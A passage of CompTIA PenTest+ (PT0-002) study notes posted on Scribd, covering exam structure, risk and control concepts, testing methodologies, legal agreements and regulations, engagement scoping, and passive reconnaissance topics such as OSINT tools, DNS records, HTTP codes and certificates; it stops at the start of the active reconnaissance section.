0% found this document useful (0 votes)

4K views234 pages

CompTIA+PenTest++ (PT0 002) +Study+Notes

Uploaded by

Daniel Profant

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

4K views234 pages

CompTIA+PenTest++ (PT0 002) +Study+Notes

Uploaded by

Daniel Profant

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 234

CompTIA PenTest+

(PT0-002) Study Notes

Welcome to the PenTest+ (PT0-002) Course

● Welcome
o CompTIA PenTest+ Certification
▪ Considered an intermediate-level certification for technical professionals
who conduct penetration testing and vulnerability management in
on-premise, cloud, and hybrid environments in their careers

o Penetration Testing/Vulnerability Assessment Stages

▪ Planning and scoping
▪ Reconnaissance
▪ Scanning
▪ Enumeration
▪ Attack
▪ Exploitation
▪ Reporting
▪ Communication

o Recommended Prerequisites
▪ Intermediate-level security professionals with at least 3 to 4 years of
broad hands-on experience
▪ Security+ and CySA+ certified (not a strict requirement)
● Knowledge from the CompTIA Security+ exam is considered
assumed knowledge
o Computer security
o Security analysis
o Penetration testing

o Five Domains
▪ Domain 1: Planning and Scoping (14%)
● Focused on techniques that emphasize governance, risk, and
compliance concepts, scoping and organizations or customer
requirements, and demonstrating an ethical hacking mindset

▪ Domain 2: Information Gathering and Vulnerability Scanning (22%)

● Focused on your ability to conduct vulnerability scanning, passive
reconnaissance, active reconnaissance, vulnerability
management, and analyzing various types of scanning and
-1-

https://www.DionTraining.com © 2022
Dion Training Solutions, LLC is a Platinum Delivery Partner for CompTIA. CompTIA ® is a registered trademark of the Computer and Computing Technology Industry Association.
All rights reserved. v1.0
CompTIA PenTest+
(PT0-002) Study Notes

enumeration results

▪ Domain 3: Attacks and Exploits (30%)

● Focused on your ability to research social engineering techniques,
perform network attacks, conduct wireless attacks, perform
application-based attacks, conduct attacks on cloud technologies,
and perform post-exploitation techniques against the expanded
attack surfaces that exist in a typical enterprise network

▪ Domain 4: Reporting and Communication (18%)

● Focused on your ability to document the findings from a
penetration test, analyze the results, and recommend appropriate
remediations for the identified vulnerabilities in a well-written
report to meet business and regulatory compliance requirements

▪ Domain 5: Tools and Code Analysis (16%)

● Focused on your ability to identify the proper tool to be used
during each phase of a penetration test based on a given use case,
and your ability to identify and analyze scripts or code samples
and their intended effects in several programming and scripting
languages, such as Python, Ruby, Perl, JavaScript, PowerShell, and
Bash

▪ You don’t have to be an expert in any of these programming and scripting

languages
▪ Domains and their objectives will not be presented in order
▪ You will get a mixture of questions from across all five domains and the
21 objectives

o About the Exam

▪ 165 minutes to answer up to 90 questions (~70-90)
▪ Multiple-choice, multiple-select, PBQs
▪ 3-5 PBQs, 80-85 multiple-choice/multiple-select questions
▪ Score at least 750 out of 900 points to pass (80-85%)

o Exam Voucher
▪ Get your exam voucher at store.comptia.org for regular pricing

-2-

▪ Save 10% and get access to our searchable video library when you get
your exam voucher at diontraining.com/vouchers

o Four Tips
▪ Closed captions are available
▪ You can adjust the playback speed
▪ Download and print this study guide
▪ Join our Facebook group at facebook.com/groups/diontraining
● If you don’t have Facebook, you can email us at
[email protected]

● Exam Tips
o Tips and Tricks
▪ There will not be any trick questions on test day
▪ Be on the lookout for distractors or red herrings
▪ Pay close attention to words that are in different formats
▪ Base your answers on your studies instead of personal work experience
▪ Choose the answer that is correct for the highest number of situations
▪ Recognize, not memorize
▪ Most tool-based questions require you to know the ‘why’ behind using
such tools

-3-

Planning an Engagement
● Planning an Engagement
o Engagement
▪ A singular penetration testing project planned and scoped by the
requesting client and the performing analysts

o Domain 1: Planning and Scoping

▪ Objective 1.1
● Compare and contrast governance, risk, and compliance concepts
▪ Objective 1.2
● Explain the importance of scoping and organizational/customer
requirements
▪ Objective 1.3
● Given a scenario, demonstrate an ethical hacking mindset by
maintaining professionalism and integrity

o Penetration Tester
▪ An authorized threat actor who tries to identify the ways
an unauthorized intruder could damage a network

● Risk
o Risk
▪ The probability that a threat will be realized

▪ Cybersecurity Analyst
● Minimizes vulnerabilities
▪ Penetration Tester
● Finds and exploits vulnerabilities

o Vulnerability
▪ Any weakness in the system design or implementation

o Threat
▪ Anything that could cause harm, loss, damage, or compromise to
information technology systems

-4-

o Risk Management
▪ Finds ways to minimize the likelihood of a certain outcome from
occurring and to achieve the desired outcomes

o Risk Types
▪ Inherent Risk
● Occurs when a risk is identified but no mitigation factors are
applied
● There will always be some inherent risk some attackers will try to
exploit

▪ Residual Risk
● Occurs when a risk is calculated after applying mitigations and
security controls

▪ Risk Exception
● Created risk due to an exemption being granted or failure to
comply with corporate policy
● Mitigations
o Track exceptions
o Measure potential impact
o Implement compensating controls

● Risk Handling
o Risk Avoidance
▪ Stops a risky activity or chooses a less risky alternative
▪ Eliminates the hazards, activities, and exposures with potential negative
effects

-5-

o Risk Transfer
▪ Passes the risk to a third party, such as an insurance company

o Risk Mitigation
▪ Minimizes the risk to an acceptable level which an organization can
accept

o Risk Acceptance
▪ Accepts the current level of risk and the costs associated with it if that
risk were realized

o Risk Appetite
▪ The amount of risk an organization is willing to accept in pursuit of its
objectives
▪ Also called risk attitude and risk tolerance

▪ Risk appetite vs Risk tolerance

● Risk appetite
o Overall generic level of risk the organization is willing to
accept

● Risk Tolerance
o Specific maximum risk the organization is willing to take
about a specific identified risk

o There will always be tradeoffs in choosing which risk handling action to take
▪ The higher the security, the higher the cost, and often, the lower the
usability

● Controls
o Categories
▪ Compensative
● Used in place of a primary access control measure to mitigate a
given risk
● Example: dual control

-6-

▪ Corrective
● Reduces the effect of an undesirable event or attack
● Examples: fire extinguishers and antivirus solutions

▪ Detective
● Detects an ongoing attack and notifies the proper personnel
● Examples: alarm systems, closed circuit television systems, and
honeypots

▪ Deterrent
● Discourages any violation of security policies, both by attackers
and insiders
● Example: surveillance camera sign

▪ Directive
● Forces compliance with the security policy and practices within
the organization
● Example: Acceptable Use Policy (AUP)

▪ Preventive
● Prevents or stops an attack from occurring
● Examples: password protection, security badges, antivirus
software, and intrusion prevention systems

▪ Recovery
● Recovers a device after an attack
● Examples: Disaster Recovery Plans (DRPs), backups, and continuity
of operations plans

o Defense in depth
▪ Layers various access controls for additional security

o Broad Categories
▪ Administrative (Managerial)
● Manages personnel and assets through security policies,
standards, procedures, guidelines, and baselines
● Examples: proper data classification and labeling, supervision of
personnel, and security awareness training

-7-

▪ Logical (Technical)
● Implemented through hardware or software and used to prevent
or restrict access to a system
● Examples: firewalls, intrusion detection systems, intrusion
prevention systems, authentication schemes, encryption, new
protocols, auditing or monitoring software, and biometrics

o Auditing
▪ One-time evaluation of a security posture

o Monitoring
▪ Ongoing process that continually evaluates the
system or its users
▪ Organizations should automate the process as
much as is practical
▪ Continuous monitoring includes:
● Change management
● Configuration management
● Log monitoring
● Status report analysis

▪ Physical
● Protects the organization’s personnel and facilities
● Examples: fences, locks, security badges, proximity cards for entry
into the building, guards, access control vestibules, biometrics,
and other means of securing the facility

● PenTest Methodologies
o Methodology
▪ A system of methods used in a particular area of study or activity

o Methodology (PenTest)
▪ The systematic approach a pentester uses before, during, and after a
penetration test, assessment, or engagement
▪ Penetration tests use the same steps taken by threat actors or hackers

-8-

o NIST Special Publication 800-115

▪ Technical Guide to Information Security Testing and Assessment

o Adversary Emulation
▪ Mimics the tactics, techniques, and procedures of a real-world threat
actor in a penetration test

● MITRE ATT&CK Framework

▪ A knowledge base that is maintained by the MITRE Corporation for the
listing and explaining common adversary tactics and techniques observed
in the real world (attack.mitre.org)

-9-

▪ Maps out each threat actor’s methodology during different types of

attacks
▪ It is a great way to visualize an adversary’s techniques, capabilities, and
capacities

● Penetration Standards
o Open Web Application Security Project (OWASP)
▪ Provides community-led software projects, education, and training, and
has become the source for securing the web (owasp.org)

▪ OWASP Web Security Testing Guide

● A comprehensive guide to testing the security of web applications
and web services

▪ OWASP Top 10
● A standard awareness document for developers and web
application security

o Open-Source Security Testing Methodology Manual (OSSTMM)

▪ Provides a methodology for a thorough security test
▪ Open-source and free to disseminate and use
▪ Latest version (Ver.3) was released in 2010
- 10 -

▪ OSSTMM Audit
● Used to create an accurate measurement of security at an
operational level in an organization, void of assumptions and
anecdotal evidence

o Information Systems Security Assessment Framework (ISSAF)

▪ A comprehensive guide when conducting a penetration test that links
individual penetration testing steps with the relevant penetration testing
tools
▪ Created by the Open Information Systems Security Group (OISSG)
▪ Last updated in 2015

o Penetration Testing Execution Standard (PTES)

▪ Developed to cover everything related to a penetration test
▪ Aims to provide a common language and scope for performing
penetration tests

- 11 -

● Planning a Test

o Who is the target audience?

▪ The scope will be vastly different because of different sizes, missions, and
operations

o What is the objective?

▪ Understanding the target audience and their budget can help design a
better engagement that most efficiently and effectively meets the
objectives

o What resources will be required?

▪ Adjust the scope based on the available resources
▪ Consider what resources will be needed and the cost associated with
them
- 12 -

o Is this a compliance-based assessment?

▪ Most organizations or legislative bodies provide checklists for testers to
utilize which ensures all the appropriate devices have been scanned to
the appropriate level

o Who will we communicate with and how often?

▪ You will need a trusted agent inside the organization that you can
communicate with

o What product will be required to be presented at the end of the assessment?

▪ Report requirements are negotiable and should be discussed during
planning

o Are there technical constraints placed upon the engagement?

▪ Any limitations or constraints must be understood during the planning
phase so that the assessment can be properly scoped
▪ Ensure the organization understands the assessment is just a snapshot of
their current security posture

o How comprehensive will the penetration test need to be?

▪ The more comprehensive it is, the longer the duration and the larger the
scope
▪ Determine which parts of the organization will be included in the
assessment

- 13 -

● Legal Concepts
o Written Permission
▪ Prevents a penetration tester, also known as an ethical hacker or
authorized hacker, from going to prison

▪ Ensure the client is aware that certain types of testing during the
engagement may cause damage to their systems or the information they
contain

o Statement of Work (SOW)

▪ A formal document that details the tasks to be performed
during an engagement

▪ The statement of work will usually contain the list of deliverables

● Final report
● Responsibilities of the penetration tester and the client
● Schedule
● Timelines for payments

o Master Service Agreement (MSA)

▪ A specialized type of contract that is used to govern future transactions
and agreements

o Service-Level Agreement (SLA)

▪ A commitment between a service provider (pentester) and a client,
commonly used for security as a service type of products or penetration
testing services

- 14 -

o Non-Disclosure Agreement (NDA)

▪ A legal document that stipulates that the parties will not share
confidential information, knowledge, or materials with unauthorized
third parties
▪ Ask clients to also sign your own version of an NDA

o Confidentiality
▪ The principle and practice of keeping sensitive information private unless
the data owner or custodian gives explicit consent to have it shared to a
third party
▪ Gain a clear understanding of what data is sensitive to the organization
and how to best protect it

● Regulatory Compliance

o Health Insurance Portability and Accountability Act (HIPAA)

▪ Affects healthcare providers, facilities, insurance companies, and medical
data clearing houses

o Health Care and Education Reconciliation Act of 2010

▪ Affects both healthcare and educational organizations

o Sarbanes-Oxley (SOX)
▪ Affects publicly traded U.S. corporations
▪ Enacted by congress as the Public Company Accounting Reform and
Investor Protection Act of 2002
▪ Failure to follow can result in senior leadership receiving jail time for non-
compliance

- 15 -

o Gramm-Leach-Bliley Act of 1999 (GLBA)

▪ Affects banks, mortgage companies, loan offices, insurance companies,
investment companies, and credit card providers
● Directly affects the security of personal identifiable information
● Prohibits sharing financial information with any third parties
● Provides guidelines for securing that financial information

o Federal Information Security Management Act of 2002 (FISMA)

▪ Affects federal agencies
▪ Replaced and strengthened the Computer Security Act of 1987

o Federal Privacy Act of 1974

▪ Affects any U.S. government computer system that collects, stores, uses,
or disseminates personally identifiable information
▪ Federal Privacy Act does not apply to private corporations
o Family Educational Rights and Privacy Act (FERPA)
▪ Protects the privacy of student education records

o Economic Espionage Act of 1996

▪ Affects organizations with trade secrets and anyone who tries to use
encryption for criminal activities

o Children’s Online Privacy Protection Act (COPPA)

▪ Imposes certain requirements on websites owner and online services that
are directed to children under 13 years of age
▪ The fine from the Federal Trade Commission (FTC) is about $40,000 per
violation

o General Data Protection Regulation (GDPR)

▪ Places specific requirements on how consumer data of the residents of
the European Union and Britain must be protected
▪ Personal data cannot be collected, processed, or retained without
informed consent
▪ “The right to be forgotten”
▪ GDPR applies globally to all companies and organizations that perform
business with European Union citizens
▪ Failure to comply with GDPR's requirements can lead to fees or fines
levied against the organization

- 16 -

▪ A GDPR checklist can be found at gdpr.eu

o Payment Card Industry Data Security Standard (PCI-DSS)

▪ An agreement any organization which collects, stores, or processes credit
card customer information must abide by
▪ PCI-DSS is a standard, and technically not a regulation

▪ Cardholder Data Protection

● Create and maintain a secure infrastructure using dedicated
appliances and software to monitor and prevent attacks
● Employ best practices, such as changing default passwords and
training users not to fall victim of phishing campaigns
● Continuously monitor for vulnerabilities and use updated
antimalware protections
● Provide strong access control mechanisms and utilize the concept
of least privilege

▪ Requires a consistent process of assessment, remediation, and reporting

▪ Qualified Security Assessor (QSA)

● Designation for authorized independent security organizations
that are certified to the PCI-DSS standards

▪ Report on Compliance (ROC)

● Details an organization’s security posture, environment, systems,
and protection of cardholder data

- 17 -

▪ Level 2, 3, and 4 merchants can conduct a self-test to prove active efforts

of securing infrastructure

▪ PCI-DSS also requires regular vulnerability scans to be conducted

● Professionalism
o A penetration tester must be aware of the laws that deal with hacking, since
penetration testing is effectively hacking

o Consult with an attorney before accepting and attempting a penetration testing

assignment

o Section 1029
▪ Focused on fraud and relevant activity with access devices
o Section 1030
▪ Focused on fraud and related activity wit-h computers, which is loosely
defined to include any device connected to a network
▪ Also covers the act of exceeding one’s access rights

o Written Permission
▪ Secure a written permission from the target organization
▪ Your get out of jail free card

o Cloud Providers
▪ Gain permissions from the target organization, as well as from the cloud
provider

o Confidentiality
▪ You are responsible for protecting the confidential information you will
find
▪ You are also responsible for protecting the information about network
vulnerabilities
▪ Each member should have a background check conducted on them

o Termination
▪ Stop immediately upon discovering a real attack or scanning the wrong
target

- 18 -

o Fees, Fines, and Criminal Charges

▪ During planning, think about the possible scenarios
▪ Make sure the process is clearly understood by those who need to be
involved
▪ The thing that separates penetration testers from malicious actors is
permission

- 19 -

Scoping an Engagement
● Scoping an Engagement
o Scope
▪ The combined objectives and requirements needed to complete an
engagement
▪ The scope of the project should be first agreed upon

o Domain 1: Planning and Scoping

● Defining the Scope

o Proper scoping process ensures a cost-effective penetration test
▪ All parties must have a clear understanding of the test’s goals and
objectives

o Other Factors to Consider

▪ Wireless location area network
▪ VPN connection
▪ Cloud migration

o Cloud Services
▪ Software as a Service (SaaS)
● The service provider provides the client organization with a
complete solution
▪ Infrastructure as a Service (IaaS)
● The service provider provides dynamic allocation of additional
resources without requiring clients to buy the hardware and
underlying operating systems

- 20 -

▪ Platform as a Service (PaaS)

● The service provider provides the client organization with the
hardware and software needed for a specific service to operate

o Application Programming Interface (API)

▪ A type of software intermediary that allows two applications to talk to
each other

o Identify any web or mobile applications that may become part of the scope
▪ Local network
▪ Cloud server
▪ Web or mobile applications

● Adversary Emulation
o Adversary Emulation
▪ A specialized type of penetration testing that involves trying to mimic the
tactics, techniques, and procedures of a real-world threat actor

o Threat Actor
▪ The generic term used to describe unauthorized hackers who wish to
harm networks or steal secure data

o Script Kiddie
▪ The least skilled type of attacker who uses freely available tools on
the Internet or in openly available security toolsets that penetration
testers might also use
▪ Script kiddies conduct their attacks for profit, to gain credibility, or
just for laughs

o Insider Threat
▪ People who have authorized access to an organization’s network,
policies, procedures, and business practices

▪ Prevention
● Data loss prevention
● Internal defenses
● SIEM search

- 21 -

▪ Competitor
● A rogue business that attempts to conduct cyber espionage
against an organization

▪ Organized Crime
● A category of threat actor that is focused on hacking and
computer fraud in order to receive financial gains
● Organized crime hackers are well-funded and can use
sophisticated tools

▪ Hacktivist
● A politically motivated hacker who targets governments,
corporations, and individuals to advance their own political
ideologies or agendas

▪ Nation-State/Advanced Persistent Threat (APT)

● A group of attackers with exceptional capability, funding, and
organization with an intent to hack a network or system
● Nation states conduct highly covert attacks over long periods of
time

● Plausible deniability
● False flag attack
o Uses the TTPs of a different nation state in order to
implicate them in an attack

o Each threat actor conducts these attacks for different reasons and motivations
▪ Use threat actor knowledge to conduct threat modeling and emulation
● Simulating an APT attack involves developing own custom code
and exploits
● Emulating a script kiddie involves the use open-source tools to
conduct the attacks
● Modeling an insider threat would require some internal
knowledge about the target

- 22 -

● Target List
o Internal Target
▪ Inside the organization’s firewall and requires testers to be on-site, gain
access through a VPN, or exploit a user’s computer inside the
organizational network

o External Target
▪ Can be accessed directly from across the Internet

o First-party and Third-party Hosted Assets

▪ Must be informed if allowed to attack first-party hosted servers only or
also assets hosted by a third-party

o If physical assessment will be in scope, determine which locations are covered by

the scope of the assessment

o On-Site Asset
▪ Any asset that is physically located where an attack is being carried out

o Off-Site Asset
▪ Any asset that provides a service for a company not necessarily located at
the same place
▪ Employee-owned devices may also be categorized as an off-site location

- 23 -

o Users tend to be the easiest attack vector to go after

o Negotiate which network is included and excluded in the scope of the

engagement
▪ IP addresses or ranges
▪ Associated domains or subdomains
▪ DNS servers

o Autonomous System Number (ASN)

▪ A unique identifier that defines a group of one or more IP prefixes run by
one or more network operators that maintain a single, clearly defined
routing policy

o A web application and its associated APIs could be used for either public facing
applications or only be used internal to the organization
▪ Determine any mission-critical web applications

● Identifying Restrictions
o Ensure the organization understands the exact operational impact of the risk
tolerance and restrictions
▪ Risk tolerance will also impact the schedule and timing of a penetration
test

o Scope Creep
▪ Occurs when a client starts asking for more services than what is listed in
the statement of work

▪ Prevention
● Addendum to the contract
● Prearranged cost for expansion

o Location
▪ The location of the client, the pentester, or the in-scope third-party
hosted services will also have restrictions
▪ Consult with your lawyer before accepting a contract and ensure you can
legally perform the services

- 24 -

o Regulations
▪ U.S. Export Administration Regulations (EAR)
▪ Wassenaar Arrangement
● Outlaws the exportation of a technology that can be used both in
a regular commercial setting and as a weapon

● Many penetration testing tools are also considered surveillance

tools under the Wassenaar Agreement

o Encryption
o Wireshark
▪ A powerful open-source protocol analysis tool that
can decrypt many different types of encryption
protocols

● Rules of Engagement
o Rules of Engagement (ROE)
▪ The ground rules that both the organization and the penetration tester
must abide by

o Timeline
▪ Used to represent a series of events that transpire within a discrete
period

o Locations
▪ All authorized locations should be listed in the ROE, especially those that
cross international borders

o Time Restrictions
▪ Used to specify certain times that a penetration tester is authorized or
unauthorized to conduct their exploits and attacks
▪ Explain the importance of conducting the penetration test during normal
business hours

o Transparency

- 25 -

▪ Trusted Agent
● An in-house staff member who will be designated as a monitor in
the organization during the assessment
● The trusted agent can also provide the penetration testers with
resources

o Boundaries
▪ Used to refer to what systems may be targeted or what techniques can
be utilized

● Assessment Types
o Goal-Based Assessment
▪ A type of assessment with a specific goal in mind

o Objective-Based Assessment
▪ A type of assessment where the tester seeks to ensure that the
information remains secure
▪ Objective-based assessment is more like a real attack

o Compliance-Based Assessment
▪ A type of assessment that focuses on finding out if policies and
regulations are being properly followed
● Examples: PCI-DSS, GDPR, HIPAA, Sarbanes-Oxley, GLBA

o Premerger Assessment
▪ A type of assessment that is conducted before two companies merge
with each other in a period of time known as due diligence

o Supply Chain Assessment

▪ A type of assessment that occurs when a company requires its suppliers
to ensure that they meet a given level of cybersecurity requirements
▪ Get permission from the owner of the network (organization’s supplier)
before engagement

o Red Team Assessment

- 26 -

▪ A type of assessment against the organizational network that is executed

by their own internal penetration testers

o Testing Strategies
▪ Unknown Environment
● An assessment where the penetration tester has no prior
knowledge of the target organization or their network
● The penetration tester will spend a lot of time in the information
gathering and vulnerability scanning phase

▪ Partially-Known Environment
● The most common type of assessment which entails partial
knowledge of the target organization and its information systems
● This decreases the time spent in the information gathering phase
to spend more time identifying potential vulnerabilities

▪ Known Environment
● A test where the penetration tester is given all the details about
the organization, network, systems, and the underlying
infrastructure
● The penetration tester can spend more time probing for
vulnerabilities and exploits

● Validating the Scope

o Key Areas
▪ The scope and the in-scope target assets
▪ What is excluded from the scope and considered out of bounds
▪ What strategy will be used

- 27 -

▪ What the timeline will be for any testing

▪ Any restrictions or applicable laws that will apply to the engagement
▪ Any third-party service providers, services, or off-site locations that are
being considered
▪ The proper communication channels to use during the assessment to
provide updates to key stakeholders

o Allowed List
▪ Authorized targets
o Excluded List
▪ Unauthorized targets

o Think about any possible security exceptions that may need to be utilized as
contingencies

● Limitations and Permission

o If there is an unauthorized disclosure by accident, your company may be held
liable

o Contractual Documents
▪ Statement of Work
▪ Master Service Agreement
▪ Service-Level Agreement
▪ Non-Disclosure Agreement

▪ In your contracts and final documentation, always include any disclaimers

and liability limitations to protect yourself and your company

o During Engagement
▪ Always maintain your professionalism as a penetration tester
▪ Your team will be limited to performing only what are considered
allowable tests
▪ Limit the invasiveness of the engagement based upon the agreed upon
scope
▪ Limit the use of specific tools to specific types of engagements
▪ Better to ask permission than to beg forgiveness in penetration testing
Passive Reconnaissance
- 28 -

● Passive Reconnaissance
o Reconnaissance
▪ Focuses on gathering as much information about the target as possible,
and can either be passive or active in nature

o Domain 2: Information Gathering and Vulnerability Scanning

▪ Objective 2.1
● Given a scenario, perform passive reconnaissance

● Information Gathering
o Reconnaissance
▪ Learning about an organization in a systematic attempt to locate, gather,
identify, and record information about the targets

o Footprinting
▪ Figuring out exactly what types of systems the organization uses to be
able to attack them in the next phase of the assessment

o Passive Reconnaissance
▪ Attempts to gain information about targeted computers and networks
without actively engaging with those systems
● Online research
● Social engineering
● Dumpster diving
● Email harvesting

▪ Gather and catalog all reconnaissance findings for others to review and
use

▪ Large penetration testing teams often assign different roles to different

members

● Open-Source Intelligence (OSINT)

- 29 -

o Open-Source Intelligence (OSINT)

▪ The collection and analysis of data gathered from publicly available
sources to produce actionable intelligence
● Social media
● Blogs
● Newspapers
● Government records
● Academic/professional publications
● Job listing
● Metadata
● Website information

o Check out the company’s investor relations site or page on its main site
o Understand the culture of a target company by checking blogs and social media

o Key Details
▪ Roles different employees have
▪ Different teams and departments
▪ Contact information
▪ Technical aptitude and security training
▪ Employee and managerial mindset

● Social Media Scraping

o Start with the organization’s own social media profiles and accounts
▪ Some employees even publish their own personally identifiable
information

o LinkedIn
o Monster
o Indeed
o ZipRecruiter
o Glassdoor

● OSINT Tools

- 30 -

o Open-source intelligence tools find actionable intelligence from various publicly

available sources
▪ Public websites
▪ Whois database
▪ DNS servers

o Metagoofil
▪ A Linux-based tool that can search the metadata associated with public
documents located on a target’s website

o Metadata
▪ The data about the data in the file

o Fingerprinting Organizations with Collected Archives (FOCA)

▪ Used to find metadata and hidden information in collected documents
from an organization

o The Harvester
▪ A program for gathering emails, subdomains, hosts, employee names,
email addresses, PGP key entries, open ports, and service banners from
servers

o Recon-ng
▪ Uses a system of modules to add additional features and functions for
your use
▪ It is a cross-platform web reconnaissance framework

o Shodan
▪ A website search engine for web cameras, routers, servers, and other
devices that are considered part of the Internet of things

o Censys
▪ A website search engine used for finding hosts and networks across the
Internet with data about their configuration

o Maltego

- 31 -

▪ A piece of commercial software used for conducting open-source

intelligence that visually helps connect those relationships
▪ It can automate the querying of public sources of data and then compare
it with other info from various sources

● DNS Information
o Domain Name System (DNS)
▪ A system that helps network clients find a website using human readable
hostnames instead of numeric IP addresses

o Address (A) Record

▪ Links a hostname to an IPv4 address

o AAAA Record
▪ Links a hostname to an IPv6 address

o Canonical Name (CNAME) Record

▪ Points a domain to another domain or subdomain

o Mail Exchange (MX) Record

▪ Directs emails to a mail server

o Start of Authority (SOA) Record

▪ Stores important information about a domain or zone

o Pointer (PTR) Record

▪ Correlates an IP address with a domain name

o Text (TXT) Record

▪ Adds text into the DNS

o Service (SRV) Record

▪ Specifies a host and port for a specific service

o Nameserver (NS) Record

▪ Indicates which DNS nameserver has the authority
o Pull up and look at all the DNS records to check for relevant information

- 32 -

▪ Focus on MX, TXT, and SRV records to check for email and third-party
SaaS solutions

o Name Server Lookup (nslookup)

▪ A cross-platform tool used to query the DNS to provide the mapping
between domain names and IP addresses or other DNS records

o Whois
▪ A command line tool on Linux, which is also a website, that is a query and
response protocol for Internet resources
▪ Whois is not nearly as valuable as before, but still helpful to be reviewed

● Public Repositories
o Public Source Code Repositories
▪ Websites that allow developers to work together in an agile way to
create software very quickly
▪ Private files can sometimes be mistakenly classified as public for anyone
to find
▪ Example: GitHub, Bitbucket, SourceForge
▪ Public source code repositories contain a lot of valuable data

o Website Archives/Caches
▪ Wayback Machine
▪ Deleted data can still exist somewhere on the Internet

o Image Search

● Search Engine Analysis

o Google Hacking
▪ Open-source intelligence technique that uses Google search operators to
locate vulnerable web servers and applications
● Quotes
o Use double quotes to specify an exact phrase and make a
search more precise

● NOT

- 33 -

o Use the minus sign in front of a word or quoted phrase to

exclude results that contain that string

● AND/OR
o Use these logical operators to require both search terms
(AND) or to require either search term (OR)

● Scope
o Different keywords that can be used to select the scope of
the search, such as site, filetype, related, allintitle, allinurl,
or allinanchor

● URL Modifiers
o Modifiers that can be added to the results page to affect
the results, such as &pws=0, &filter=0, and &tbs=li:1

o Google Hacking Database (GHDB)

▪ Provides a database of search strings optimized for locating vulnerable
websites and services

● URL Analysis
o URL Analysis
▪ Activity that is performed to identify whether a link is already flagged on
an existing reputation list, and if not, to identify what malicious script or
activity might be coded within in

▪ Importance
● Resolving percent encoding
● Assessing redirection of the URL
● Showing source code for scripts in URL

o HTTP Method
▪ A set of request methods to indicate the desired action to be performed
for a given resource
▪ A request contains a method, a resource, a version number, the header,
and the body of the request
▪ Methods

- 34 -

● GET
o The principal method used with HTTP and is used to
retrieve a resource

● POST
o Used to send data to the server for processing by the
requested resource

● PUT
o Creates or replaces the requested resource

● DELETE
o Used to remove the requested resource

● HEAD
o Retrieves the headers for a resource only and ignores the
body

▪ Data submitted via a URL is delimited by the (?) character

▪ Query Parameters
● Usually formatted as one or more name=value pairs with
ampersands (&) delimiting each pair

▪ A (#) is used to indicate a fragment or anchor ID and it’s not processed by

the webserver

o HTTP Response Codes

▪ The header value returned by a server when a client requests a URL

▪ Codes
● 200
o Indicates a successful GET or POST request (OK)

● 201
o Indicates where a PUT request has succeeded in creating a
resource
● 3xx

- 35 -

o Any code in this range indicates that a redirect has

occurred by the server

● 4xx
o Any code in this range indicates an error in the client
request

o 400
▪ Indicates that a request could not be parsed by the
server

o 401
▪ Indicates that a request did not supply
authentication credentials

o 403
▪ Indicates that a request did not have sufficient
permissions

o 404
▪ Indicates that a client has requested a non-existent
resource

● 5xx
o Any code in this range indicates a server-side issue

o 500
▪ Indicates a general error on the server-side of the
application

o 502
▪ Indicates a bad gateway has occurred when the
server is acting as a proxy

o 503
▪ Indicates an overloading of the server is causing
service unavailability
o 504

- 36 -

▪ Indicates a gateway timeout which means there’s

an issue with the upstream server

o Percent Encoding
▪ A mechanism to encode 8-bit characters that have specific meaning in
the context of URLs, also known as URL encoding

▪ Unreserved Characters
● a-z, A-Z, 0-9, (-), (.), (_), (~)

▪ Reserved Characters
● (:), (/), (?), (#), ([), (]), (@), (!), ($), (&), (‘), ((), ()), (*), (+), (,), (;), (=)

▪ A URL cannot contain unsafe characters

● Null string termination, carriage return, line feed, end of file, tab,
space, and (\), (<), (>), ({), (})

▪ Percent encoding allows a user-agent to submit any safe or unsafe

character (or binary data) to the server within the URL

▪ Warning
● Percent encoding can be misused to obfuscate the nature of a
URL (encoding unreserved characters) and submit malicious input
as a script or binary or to perform directory traversal

- 37 -

● Some really tricky attackers may double encode the URL by

encoding the percent sign

● Cryptographic Flaws
o Cryptographic Inspection
▪ Checks validity of certificates or potential vulnerabilities to exploit within
the target servers

o Cipher Suite
▪ Defines the algorithm supported by the client and server when
requesting to use encryption and hashing
▪ Example:
● ECDHE_RSA_AES128_GCM_SHA256
● TLS_AES_256_GCM_SHA384

▪ Cybersecurity professionals need to understand how to read these cipher

suites

o To test a web server to see its cipher suite, visit ssllabs.com

o Encryption Algorithms
▪ ChaCha20
▪ RSA
▪ AES
▪ GCM
▪ CBC

o SSL 2 and SSL 3 are now considered insecure

o Digital Certificates
▪ Falsified digital certificates can also be used to trick the target
organization’s users
▪ Identify other potential targets or servers in digital certificate fields
● Subject Alternative Name (SAN) Field
o Allows the use of digital certificates with other domains in
addition to the main domain

- 38 -

● Wildcard
o Allows the use of the same public key certificate and have
it displayed as valid across all subdomains

o A revoked certificate affects all other subdomains

o Look into the SAN field or the Wildcard to check for other domains or
subdomains

o Certificate Revocation List (CRL)

▪ An online list of digital certificates revoked by the certificate authority

o Online Certificate Status Protocol (OCSP)

▪ Determines the revocation status of a digital certificate using its serial
number
▪ OCSP Responder

o With CRL and OCSP, the client validates the certificate

o Certificate Pinning
▪ A method of trusting digital certificates that bypass the CA hierarchy and
chain of trust

▪ HTTP Public Key Pinning

● allows a website to resist impersonation attacks

o Certificate Stapling
▪ Allows a web server to perform certificate status check
▪ Eliminates the need for additional connection at the time of the request

o HTTP Strict Transport Security (HSTS)

▪ Allows a web server to notify web browsers to only request using HTTPS
and not HTTP

- 39 -

● CWE & CVE

o A penetration tester needs to keep updated with the latest techniques and
vulnerabilities
▪ CVEs
▪ CWEs
▪ Security Blogs
▪ Podcasts

o Computer Emergency Response Team (CERT) - cisa.gov/uscert

▪ Maintained by the United States federal government and lists all of the
different known vulnerabilities that they have identified in the wild as
well as those self-reported by industry partners

o JPCERT - jpcert.or.jp
▪ Japan’s version of the Computer Emergency Response Team

o National Vulnerability Database (NVD) - nvd.nist.gov

▪ Provided by the National Institute for Standards and Technology (NIST)
which displays all of the latest vulnerabilities and assigns them each a
CVE number

o Common Vulnerabilities and Exposures (CVE) - cve.org

▪ Common database used worldwide that references known vulnerabilities

o Common Weakness Enumeration (CWE) – cwe.mitre.org

▪ A community-developed list of the different types of software
weaknesses and the details of those weaknesses

o Common Attack Pattern Enumeration and Classification (CAPEC) -

capec.mitre.org
▪ Help to understand and identify a particular attack so that security
researchers may better understand the different attack patterns

o Full Disclosure
▪ a mailing list from the makers of Nmap

o Understand the key terms like CVE and CWE and how they may link a
vulnerability to a potential exploit

- 40 -

Active Reconnaissance
● Active Reconnaissance
o Active Reconnaissance
